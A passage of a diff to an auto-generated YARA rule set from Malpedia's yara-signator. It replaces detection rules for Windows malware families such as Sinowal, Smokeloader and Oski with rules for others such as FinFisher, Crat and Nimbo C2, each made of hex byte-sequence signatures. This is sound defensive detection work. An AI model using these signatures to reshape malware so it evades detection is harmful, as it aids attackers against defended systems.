-		7 of them and filesize < 114688
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Sinowal_Auto : FILE
+rule MALPEDIA_Win_Pslogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00c85bb6-b85e-5ec4-8327-f739c9d5f422"
+		id = "ec7a19b3-c3a5-5a75-ac86-d0beb1e4cdd5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sinowal_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pslogger_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "ad21744a631baee0751cfa9148a29030265ec00175eb1018f5bd88e3be28754b"
+		logic_hash = "746d33059662814e87cdaa4caa4e5b548a478a0041425137f661e51552f006fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110732,32 +110837,38 @@ rule MALPEDIA_Win_Sinowal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? c78568fdffff18000000 c7856cfdffff00000000 c78574fdffff40000000 8d9554fdffff }
-		$sequence_1 = { 6800100000 8b4dfc 83c108 51 }
-		$sequence_2 = { 8a4dfb 884c5001 ebbf 5e 8be5 }
-		$sequence_3 = { 83c214 899564fdffff c78580fdffff14000000 8b8548fdffff 83c036 }
-		$sequence_4 = { ff15???????? 8945fc 837dfc00 7521 68???????? 6a00 6a00 }
-		$sequence_5 = { 7514 8b4510 50 8b4df8 51 }
-		$sequence_6 = { ff15???????? 85c0 7508 8b45f0 e9???????? }
-		$sequence_7 = { c745fc05400080 c745ec00000000 833d????????00 751a e8???????? }
-		$sequence_8 = { 8945e4 837de400 7502 eb0b 68e8030000 }
-		$sequence_9 = { 7418 8b55e8 3b55f8 7510 8b45ec 3b45fc 7508 }
+		$sequence_0 = { 8bc8 e8???????? 85c0 743b 4863f0 488bce e8???????? }
+		$sequence_1 = { e8???????? e9???????? 4c8bc5 33d2 488bc8 e8???????? 4c8bc6 }
+		$sequence_2 = { e8???????? 488d8c2480030000 e8???????? 488d542420 }
+		$sequence_3 = { 488bc8 e8???????? 8bc8 e8???????? 4863f0 85c0 750d }
+		$sequence_4 = { 488b05???????? 4833c4 4889842488000000 498bf9 498bd8 }
+		$sequence_5 = { 488bf9 483b5908 7418 488b0b 4885c9 }
+		$sequence_6 = { 7406 ff15???????? 48891e 488bd3 488bcf ff15???????? }
+		$sequence_7 = { 4883ec28 803d????????00 7511 0f1f00 e8???????? 803d????????00 }
+		$sequence_8 = { 50 e8???????? 83c40c e9???????? 8d46cf }
+		$sequence_9 = { c745e0284f4200 e9???????? c745e0244f4200 eba2 894ddc c745e0244f4200 }
+		$sequence_10 = { 0f82a6000000 83be78af060000 0f8499000000 6800800000 8d86702f0200 }
+		$sequence_11 = { 0f8544ffffff 56 ff15???????? 8b8c246c040000 5f }
+		$sequence_12 = { 0f83af000000 8bde c1fb06 8bc6 83e03f }
+		$sequence_13 = { e8???????? 8bd8 83c424 85db 0f84ef000000 8bce 8d5102 }
+		$sequence_14 = { 32d2 85db 746c 85c9 756c 8b742420 }
+		$sequence_15 = { 6bd830 56 8b048d88b14200 57 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Nitol_Auto : FILE
+rule MALPEDIA_Win_Crat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "564f8c6d-172d-53bc-8a35-617f93dc2b3b"
+		id = "02c75bda-cef6-5d61-9783-dd39d3c8cee4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nitol_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crat_auto.yar#L1-L181"
 		license_url = "N/A"
-		logic_hash = "f965a0fe296415280cef677cfeda82c56822d9b36e24511179288d488384a005"
+		logic_hash = "723ada0a4601efb2490dd7b222473b1f376d5e93aa2040691bdff635e0b77048"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110771,32 +110882,40 @@ rule MALPEDIA_Win_Nitol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a28 8d8540ffffff 50 e8???????? 83c440 668945f6 8d45ec }
-		$sequence_1 = { 57 56 68???????? 57 57 ffd5 68e8030000 }
-		$sequence_2 = { 3bc5 89442410 750e ffd7 99 b9e8030000 }
-		$sequence_3 = { 50 e8???????? 59 40 50 8d8568faffff 50 }
-		$sequence_4 = { 33db 39be88000000 0f8ee5000000 57 57 56 68???????? }
-		$sequence_5 = { 8d85e8faffff 50 ff15???????? 83c418 833d????????01 744a ff75e8 }
-		$sequence_6 = { 0f86d5030000 6a4b 50 e8???????? 8d8588f4ffff 50 e8???????? }
-		$sequence_7 = { 50 ff15???????? 668365f600 6800010000 e8???????? 83c41c 8845f4 }
-		$sequence_8 = { c645ed11 ff15???????? 8945f0 8d852cffffff 50 e8???????? 8945f4 }
-		$sequence_9 = { ffd6 668945d6 8d45cc 6a0c 50 8d8540ffffff }
+		$sequence_0 = { e8???????? 488bd0 488d4d90 e8???????? 90 488bd0 }
+		$sequence_1 = { e8???????? 488bd0 488d8d60010000 e8???????? 90 }
+		$sequence_2 = { e8???????? 488bd0 488d8db8000000 e8???????? 90 }
+		$sequence_3 = { e8???????? 488bc8 4885c0 7433 }
+		$sequence_4 = { e8???????? 488bd0 488d8d78010000 e8???????? 90 }
+		$sequence_5 = { e8???????? 488bd0 488d8d70010000 e8???????? 90 }
+		$sequence_6 = { 498bc4 48833d????????10 480f4305???????? 482bc8 }
+		$sequence_7 = { 483bc8 7406 e8???????? 90 488b542420 4883c2e8 }
+		$sequence_8 = { 33d2 c1e902 f7f1 eb02 }
+		$sequence_9 = { ffd0 85c0 750f ff15???????? }
+		$sequence_10 = { 8d7118 57 83f810 7d08 51 }
+		$sequence_11 = { 8b45cc 8b4db0 c740180d000000 89481c 83781800 0f85fd000000 807de100 }
+		$sequence_12 = { 8b4310 46 2b430c 8975e0 83f801 7d08 51 }
+		$sequence_13 = { e8???????? ffd0 8bf0 eb02 }
+		$sequence_14 = { 8b5508 0f57c0 56 8b750c b896000000 f30f7f01 8911 }
+		$sequence_15 = { 8b45cc 8b4db0 c7401810000000 89481c }
+		$sequence_16 = { 8b5508 56 8b0a 8b7204 }
+		$sequence_17 = { 8b30 8955d8 8955e4 46 c745fc00000000 8bdf 8975e0 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 4161536
 }
-rule MALPEDIA_Win_Doublepulsar_Auto : FILE
+rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f29ce0a7-5938-5b7b-b2a5-1e58b48324b4"
+		id = "25a17b3a-8384-5e84-a1b5-2dd73e5ee0cf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doublepulsar_auto.yar#L1-L178"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coronavirus_ransomware_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "2279c234c2a28c8a309faafd6821b4cb1af9e5365add72a62e549a791ef8e967"
+		logic_hash = "d0b11b2a26c2b9ac5d26c61d4c9566b412c8fa0dfeb2d6ec35815769f67a7b2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110810,40 +110929,34 @@ rule MALPEDIA_Win_Doublepulsar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31c9 39f9 744d 89d3 }
-		$sequence_1 = { 8944243c 6689442440 88442442 e8???????? 8bf0 83c404 3bf5 }
-		$sequence_2 = { 7405 bb03000000 8b9768010000 56 68???????? }
-		$sequence_3 = { 03c0 8b8c0088b84000 8b94008cb84000 03c0 56 51 52 }
-		$sequence_4 = { ff5608 85c0 744b 894530 8b4620 8b7d65 83c703 }
-		$sequence_5 = { 48 8bd0 ff5728 85c0 7555 3933 }
-		$sequence_6 = { 53 55 51 ff15???????? 8bfb 83c9ff 33c0 }
-		$sequence_7 = { 89742424 89742420 0f8ed8000000 8bf5 }
-		$sequence_8 = { 83c428 83f802 0f85c4fdffff 8d542420 8d44241c 52 }
-		$sequence_9 = { 57 c744242808164000 c744242cfc154000 c7442430f4154000 c7442434e0154000 89742424 ff15???????? }
-		$sequence_10 = { 33c0 33db 56 57 89442430 89442434 }
-		$sequence_11 = { 56 6a01 83c00c 51 e8???????? 8bf8 83c418 }
-		$sequence_12 = { 03f0 85f6 7f10 e8???????? 3d33270000 }
-		$sequence_13 = { a1???????? 83c408 8d54244c 83c020 52 68???????? }
-		$sequence_14 = { 5d 33c0 5b 81c41c210000 c21000 8b842438210000 }
-		$sequence_15 = { ffd5 83c408 85c0 7562 8b16 c744242401000000 }
+		$sequence_0 = { 6685c9 75f5 56 2bc2 57 8b7df8 d1f8 }
+		$sequence_1 = { 56 50 89742474 89742478 e8???????? }
+		$sequence_2 = { 8bf0 83feff 7424 85f6 7420 }
+		$sequence_3 = { 7e58 a1???????? 50 e8???????? 8b0d???????? 83c404 6aff }
+		$sequence_4 = { 895004 8bfb 8b1d???????? 68???????? 66894808 c745f400000000 ff15???????? }
+		$sequence_5 = { 8b442414 8bd0 2b54bc5c 83fa01 750c 47 8944bc5c }
+		$sequence_6 = { 40 ebeb e8???????? 8b75a0 e9???????? }
+		$sequence_7 = { 51 833d????????00 c745fc00000000 752d b8???????? }
+		$sequence_8 = { e8???????? 035dc4 807d0802 8b7dc8 0f8583000000 807d0c01 757d }
+		$sequence_9 = { 84c0 7426 0fb60d???????? 0fb6c0 0fb68080fa4000 03c1 }
 
 	condition:
-		7 of them and filesize < 140288
+		7 of them and filesize < 235520
 }
-rule MALPEDIA_Win_Smokeloader_Auto : FILE
+rule MALPEDIA_Win_Finfisher_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f23556ba-5c41-5731-b926-98b3ff953aa7"
+		id = "b4569af7-ca7f-5273-a891-62c4b9307c04"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smokeloader_auto.yar#L1-L557"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.finfisher_auto.yar#L1-L148"
 		license_url = "N/A"
-		logic_hash = "14e5b0cfca13af7489c48288e9aa993c0a3271acbd4222a869c5d82af431f76e"
+		logic_hash = "d86e06755c4d193ae8f6772e0ecac909342d4c797dca10b9ca38c301b921ec55"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110855,89 +110968,38 @@ rule MALPEDIA_Win_Smokeloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d45f0 50 8d45e8 50 8d45e0 50 }
-		$sequence_1 = { 50 8d45e0 50 56 ff15???????? 56 ff15???????? }
-		$sequence_2 = { 6a00 53 ff15???????? 8d45f0 }
-		$sequence_3 = { 57 ff15???????? 6a00 6800000002 6a03 6a00 6a03 }
-		$sequence_4 = { 8bf0 8d45dc 50 6a00 53 }
-		$sequence_5 = { 0fb64405dc 50 8d45ec 50 }
-		$sequence_6 = { e8???????? 8bf0 8d45fc 50 ff75fc 56 }
-		$sequence_7 = { 740a 83c104 83f920 72f0 }
-		$sequence_8 = { 50 56 681f000f00 57 }
-		$sequence_9 = { 56 8d45fc 50 57 57 6a19 }
-		$sequence_10 = { ff15???????? bf90010000 8bcf e8???????? }
-		$sequence_11 = { 668ce8 6685c0 7406 fe05???????? }
-		$sequence_12 = { 56 ff15???????? 50 56 6a00 ff15???????? }
-		$sequence_13 = { 8b07 03c3 50 ff15???????? }
-		$sequence_14 = { 33c0 e9???????? e8???????? b904010000 }
-		$sequence_15 = { 6a40 56 6a01 8d45f8 50 }
-		$sequence_16 = { 03e8 03e9 81e5ff000000 8a442c18 88443c18 47 }
-		$sequence_17 = { 8bde 8bfe 399c241c010000 7644 8b6c2410 47 }
-		$sequence_18 = { 0fb64c3c18 0fb6c2 03c8 81e1ff000000 8a440c18 30042b 43 }
-		$sequence_19 = { 8d8de8fdffff 50 50 50 }
-		$sequence_20 = { 8985ecfdffff ffb5f0fdffff 50 53 e8???????? }
-		$sequence_21 = { 8d85f0fdffff 8b750c 8b7d10 50 57 56 }
-		$sequence_22 = { 89c6 6804010000 56 57 }
-		$sequence_23 = { 8b4514 898608020000 56 6aff }
-		$sequence_24 = { 53 e8???????? 8d8decfdffff 8d95f0fdffff }
-		$sequence_25 = { c60653 56 6a00 6a00 }
-		$sequence_26 = { 8d95f0fdffff c70200000000 6800800000 52 }
-		$sequence_27 = { 89e5 81ec5c060000 53 56 }
-		$sequence_28 = { fc 5f 5e 5b }
-		$sequence_29 = { 60 89c6 89cf fc }
-		$sequence_30 = { 30d0 aa e2f3 7505 }
-		$sequence_31 = { 89cf fc b280 31db a4 b302 }
-		$sequence_32 = { 4d 01c4 ffc9 49 }
-		$sequence_33 = { 48896c2410 4889742418 57 4883ec30 65488b042560000000 4c8b15???????? }
-		$sequence_34 = { 4883f814 72ea 488b0d???????? ff15???????? 488b0d???????? ff15???????? 488b0d???????? }
-		$sequence_35 = { 8bd7 4c8bc3 4889442420 ff15???????? 488b0b ff15???????? 8a08 }
-		$sequence_36 = { 41b800300000 ff15???????? 448b4754 488bd6 }
-		$sequence_37 = { 55 89e5 81ec54040000 53 }
-		$sequence_38 = { 01c2 31c0 ac 01c2 85c0 }
-		$sequence_39 = { 488bd8 ff15???????? 4c8d4c2454 4c8d44244c }
-		$sequence_40 = { 8b4b18 45 8b6320 4d }
-		$sequence_41 = { 49 8d3c8c 8b37 4c 01c6 }
-		$sequence_42 = { 8b7b24 4c 01c7 668b0c4f 41 8b7b1c }
-		$sequence_43 = { 01c7 8b048f 4c 01c0 }
-		$sequence_44 = { 8b4da0 8b55b8 89516c 687cda686e 8b45e4 50 }
-		$sequence_45 = { 8945f8 8b45f8 8b4868 894df4 }
-		$sequence_46 = { 31d1 75ec 58 29c6 d1ee }
-		$sequence_47 = { 57 007508 bbb84340c1 4a }
-		$sequence_48 = { 5b c9 c20800 55 89e5 83ec04 }
-		$sequence_49 = { aa e2f3 7506 7404 }
-		$sequence_50 = { 8b4da0 8b5580 895150 681256e9cc 8b45e4 50 }
-		$sequence_51 = { 3345e4 8845e3 8b4dfc 034d10 8b55f0 0355fc 034df8 }
-		$sequence_52 = { 01e8 31c9 c1c108 3208 40 }
-		$sequence_53 = { 8b5514 0355b4 39559c 7316 }
-		$sequence_54 = { 8b453c 8b7c2878 01ef 8b7720 01ee 56 }
-		$sequence_55 = { 1e 53 56 57 }
-		$sequence_56 = { 29c6 d1ee 037724 0fb7442efe }
-		$sequence_57 = { 394dfc 750e 8b55e4 2b5510 8b45f8 2bc2 8945f8 }
-		$sequence_58 = { eb0b 8b5508 0355f0 8a45ed 8802 8b4d10 034dfc }
-		$sequence_59 = { 8bec 83ec08 8b4510 2d10bf3400 8b4d0c c1e103 }
-		$sequence_60 = { 5d 5d a2???????? 95 }
-		$sequence_61 = { 17 c74424fc7c2e0000 83ec04 7504 7402 6d }
-		$sequence_62 = { ad 37 5d 0aa228b9a2ce c9 5d }
-		$sequence_63 = { d4ad d6 1d51d61d41 d6 1d55d89d52 }
-		$sequence_64 = { a2???????? ed d6 104ddc 9c }
+		$sequence_0 = { 56 8d85ccf9ffff 50 e8???????? }
+		$sequence_1 = { 68???????? 6804010000 8d85ccf9ffff 50 }
+		$sequence_2 = { 8d84860c010000 3938 740a 8b00 51 }
+		$sequence_3 = { 8365fc00 ff36 a1???????? ff5004 }
+		$sequence_4 = { c78584f7ffff40020000 8d8570f7ffff 898580f7ffff 89b588f7ffff 89b58cf7ffff }
+		$sequence_5 = { 8bd8 ffb5acf7ffff 3bde 0f856dffffff ff15???????? }
+		$sequence_6 = { ff4510 394510 72ea eb06 8b4510 }
+		$sequence_7 = { e8???????? 83c424 8b8db0f7ffff 8b4160 8985b4f7ffff 81780c00202200 0f8536050000 }
+		$sequence_8 = { 85c0 0f8538020000 6a04 8bbd48f9ffff 8d4708 }
+		$sequence_9 = { 750a bb9a0000c0 e9???????? 8bd0 8b8dc0f7ffff ff15???????? }
+		$sequence_10 = { ff15???????? 8b8db0f7ffff 895918 8b85a0f7ffff 89411c 32d2 }
+		$sequence_11 = { 8b3f 85ff 75a7 ff45f8 837df825 7293 be010000c0 }
+		$sequence_12 = { ff75fc ff750c ff15???????? 3bc6 }
+		$sequence_13 = { 50 e8???????? 83c41c c745fc04000000 6850020000 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Farseer_Auto : FILE
+rule MALPEDIA_Win_Artra_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a67d1eb-3f83-53bd-8009-08fd90d91a72"
+		id = "ff75386e-794e-5ca3-b572-9b037a957102"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.farseer_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.artra_auto.yar#L1-L262"
 		license_url = "N/A"
-		logic_hash = "c4f58eaf1a171a6ef6927bdc0d75281407b1ff19c17d7d3cb4db395f2514c097"
+		logic_hash = "0d6b75a232d52a887969f43b5d876701bc36067b1aa62db809423e4fc76fc56c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110949,32 +111011,48 @@ rule MALPEDIA_Win_Farseer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f804 770c 6a06 68???????? e9???????? 83f805 0f8590000000 }
-		$sequence_1 = { 8b4514 40 c745eceab84000 894df8 8945fc 64a100000000 8945e8 }
-		$sequence_2 = { 399c24e0000000 7307 8d8424cc000000 50 8d4c2444 e8???????? 85c0 }
-		$sequence_3 = { c1e106 030cbd20634200 eb02 8bca }
-		$sequence_4 = { c1e006 03049520634200 eb05 b8???????? f6400420 7414 }
-		$sequence_5 = { ffd5 85c0 7e2f 03f0 81fe00040000 7ce1 33c0 }
-		$sequence_6 = { 50 8d0c3e 51 53 }
-		$sequence_7 = { 85c0 757a 8b5c2424 8d751c 3bf3 }
-		$sequence_8 = { 895604 894608 8d842458020000 8d5001 8d4900 8a08 }
-		$sequence_9 = { 3bc1 0f87ad090000 ff24851d094100 838de8fdffffff 89b590fdffff }
+		$sequence_0 = { 8b442410 5f 5e 83c41c c21000 5f 33c0 }
+		$sequence_1 = { 5f 8a08 40 84c9 75f9 2bc2 880c30 }
+		$sequence_2 = { 72e3 8bc6 8d5001 5f 8a08 40 }
+		$sequence_3 = { 84d2 75f9 2bc7 3bc8 72e3 8bc6 8d5001 }
+		$sequence_4 = { 51 8bc6 57 33c9 8d7801 8da42400000000 8a10 }
+		$sequence_5 = { 800431f3 8bc6 41 8d7801 }
+		$sequence_6 = { c6042e00 e8???????? 8b542414 83c404 52 892d???????? 893d???????? }
+		$sequence_7 = { 6a00 8d442414 50 ffd7 85c0 }
+		$sequence_8 = { 8d54241c 52 ffd7 85c0 75cc 5d 5b }
+		$sequence_9 = { 55 8b2d???????? 90 8b542410 8d4c2410 }
+		$sequence_10 = { 85c0 7445 53 8b1d???????? 55 8b2d???????? }
+		$sequence_11 = { 8bb424b0000000 33db 895c2408 85f6 0f84a9000000 391e 0f85a1000000 }
+		$sequence_12 = { e8???????? 8b4c242c 8b442418 8d542414 83fafc 7418 83f910 }
+		$sequence_13 = { 40 42 84c9 75f6 e8???????? }
+		$sequence_14 = { 0f8488000000 6a00 57 ff15???????? 57 }
+		$sequence_15 = { 2bc2 03fb 8a4f01 47 }
+		$sequence_16 = { ff15???????? 57 ff15???????? 6a6d 56 ff15???????? 8bf0 }
+		$sequence_17 = { 8bf8 85ff 0f8488000000 6a00 }
+		$sequence_18 = { 51 c7442424ff030000 ff15???????? 8b542408 }
+		$sequence_19 = { b8???????? c6042f00 8d5001 8da42400000000 8a08 }
+		$sequence_20 = { c605????????00 b9???????? b8???????? 8a10 3a11 751a }
+		$sequence_21 = { 6a00 8d45f8 50 8d34fd4c114100 ff36 e8???????? 59 }
+		$sequence_22 = { 83e61f c1e606 033485e03b4100 8b45e4 }
+		$sequence_23 = { ff15???????? 6a00 ff15???????? 5f 33c0 }
+		$sequence_24 = { 75f9 2bc2 8b542428 50 68???????? }
+		$sequence_25 = { 6a00 6a00 68???????? 6801000080 ff15???????? 8d4c2428 51 }
 
 	condition:
-		7 of them and filesize < 347328
+		7 of them and filesize < 811008
 }
-rule MALPEDIA_Win_Oski_Auto : FILE
+rule MALPEDIA_Win_Gemcutter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00507fe9-9209-5e5a-8102-b7f791efd242"
+		id = "f2a59f86-1075-5464-b91b-cb447c183566"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oski_auto.yar#L1-L180"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gemcutter_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "35c4af68aedcbb90eed8cfba69202373adfb8560464fdea190e8d4d9190a864c"
+		logic_hash = "9745c8061ab88116351043d55251d3e8c32737ca442027c8a6620480abc8c8bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110988,39 +111066,32 @@ rule MALPEDIA_Win_Oski_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 a1???????? 50 8d8df0feffff }
-		$sequence_1 = { 25ff7f0000 c3 8bff 55 8bec 83ec14 ff7510 }
-		$sequence_2 = { e8???????? 83c40c e8???????? 50 a1???????? }
-		$sequence_3 = { 8975f0 e8???????? cc 8bff 55 8bec 8b550c }
-		$sequence_4 = { 0f8584fbffff 668b8590fbffff 83431810 66898568fbffff }
-		$sequence_5 = { 85c0 7557 8bb54ce0ffff 8b8d48e0ffff }
-		$sequence_6 = { 50 ff15???????? e8???????? 57 ff15???????? 8b4df8 }
-		$sequence_7 = { 85c0 0f8468010000 ff15???????? 8bf0 }
-		$sequence_8 = { 83c40c 8d959cfbffff 52 8d85dcfcffff 50 }
-		$sequence_9 = { f3c3 e9???????? 8bff 55 8bec 83ec1c a1???????? }
-		$sequence_10 = { 8b511c 83c220 52 6a00 }
-		$sequence_11 = { 8d45fc 50 8d4df8 51 6800020000 8b55f4 52 }
-		$sequence_12 = { 83c404 8b55f8 8955f4 8b45f4 50 e8???????? }
-		$sequence_13 = { 8b45f4 50 e8???????? 83c404 8b0d???????? 51 ff15???????? }
-		$sequence_14 = { 68???????? 6a00 e8???????? 83c40c 8985e4fdffff }
-		$sequence_15 = { 6800020000 8b55f4 52 ff15???????? 8945f0 837df000 }
-		$sequence_16 = { 8d55f4 52 6a00 68???????? ff15???????? 8945f0 837df000 }
+		$sequence_0 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 889ea0314000 }
+		$sequence_1 = { 8d85f0fcffff 53 50 ffd6 8d85f0fcffff }
+		$sequence_2 = { 68???????? e8???????? 83c424 8b3d???????? 56 }
+		$sequence_3 = { 6a01 ff15???????? 6a01 68???????? e8???????? 6a01 }
+		$sequence_4 = { e8???????? 83c424 8b3d???????? 56 33f6 }
+		$sequence_5 = { 83c410 8d85f0fdffff 53 50 ffd6 8b3d???????? 8d85f0fdffff }
+		$sequence_6 = { 57 53 6801001f00 ff15???????? 3bc3 be???????? }
+		$sequence_7 = { 56 ff15???????? 8bf8 8d8500fcffff }
+		$sequence_8 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 }
+		$sequence_9 = { 6a00 6801001f00 ff15???????? 85c0 7517 68e8030000 ff15???????? }
 
 	condition:
-		7 of them and filesize < 423936
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Backswap_Auto : FILE
+rule MALPEDIA_Win_Nimbo_C2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e17f855-5952-50ed-bf6a-366f7e607462"
+		id = "3fbf9b9f-3200-52f3-a15f-1eaff92b5ed0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backswap_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimbo_c2_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "bb4d774b5a39969b7683aade4505aad39c80dbe023defeb6c0c050fb546e7038"
+		logic_hash = "8589aa9b6f63efad7fde0dd033ffc7aedc0446802bcc3cc8f7fcdbf116768199"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111034,32 +111105,32 @@ rule MALPEDIA_Win_Backswap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb1c 85c9 7508 3bdf }
-		$sequence_1 = { c21000 83f0ff 5e 5f 5a }
-		$sequence_2 = { 4b eb1c 85c9 7508 3bdf }
-		$sequence_3 = { 33c9 e9???????? b32a 397d14 7412 47 8a07 }
-		$sequence_4 = { 33c9 33d2 8bdf 4b eb1c 85c9 }
-		$sequence_5 = { ff4508 8bfb 3bd3 0f8572ffffff 33c9 }
-		$sequence_6 = { 3c3f 74c4 3c2a 7508 8bdf 897508 4e }
-		$sequence_7 = { f366a5 59 5f 5e c9 c20c00 55 }
-		$sequence_8 = { 7404 8bce 8bd3 397d14 0f8e99000000 39750c 7e7b }
-		$sequence_9 = { ff4508 8bfb 3bd3 0f8572ffffff 33c9 e9???????? }
+		$sequence_0 = { 7f16 31d2 4889d9 e8???????? ba01000000 4885c0 480f4fc2 }
+		$sequence_1 = { c744245801000000 e8???????? b90f000000 4989c5 4885c0 7407 488b00 }
+		$sequence_2 = { 83e03f 41886c1c13 83c880 4188441c12 eb9d 85c0 789c }
+		$sequence_3 = { e8???????? ebe3 e8???????? 4889c1 e8???????? 4883bdd8fcffff00 7414 }
+		$sequence_4 = { 4889c1 e8???????? ba20000000 4889c1 e8???????? 4989c4 4885ff }
+		$sequence_5 = { 741a 49837d0000 7e13 4c89e1 e8???????? 4c89ea }
+		$sequence_6 = { c7859cfcffff00000000 ff5018 8905???????? 85c0 0f85f6020000 488d8dc8fcffff e8???????? }
+		$sequence_7 = { 56 53 4883ec20 31f6 4889cb 0fb6fa 4885db }
+		$sequence_8 = { c605????????01 48c705????????02000000 c605????????01 48c705????????03000000 48c705????????04000000 c605????????02 }
+		$sequence_9 = { b907000000 4c8b8424c0000000 ba03000000 4d89ce e8???????? ba03000000 b906000000 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 1141760
 }
-rule MALPEDIA_Win_Payloadbin_Auto : FILE
+rule MALPEDIA_Win_Unidentified_068_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b954a512-78f3-562b-9197-a6a1e74a513b"
+		id = "1ce41a1d-9111-5664-971b-18b33f290c67"
 		date = "2024-10-31"
